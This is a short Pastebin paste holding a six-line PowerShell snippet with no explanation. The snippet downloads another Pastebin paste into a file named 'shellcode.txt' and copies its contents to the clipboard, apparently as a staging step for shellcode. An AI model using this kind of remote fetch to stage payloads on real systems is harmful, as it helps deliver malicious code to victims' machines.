Advertisement
zaherg2291

2

Jan 17th, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. $source = "https://pastebin.com/vwVdCQ04"
  2. $destination = "shellcode.txt"
  3. $web = New-Object System.Net.WebClient
  4. $web.DownloadFile($source, $destination)
  5. $file = Get-Content -Path $destination -Encoding UTF8
  6. Set-Clipboard -Value $file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement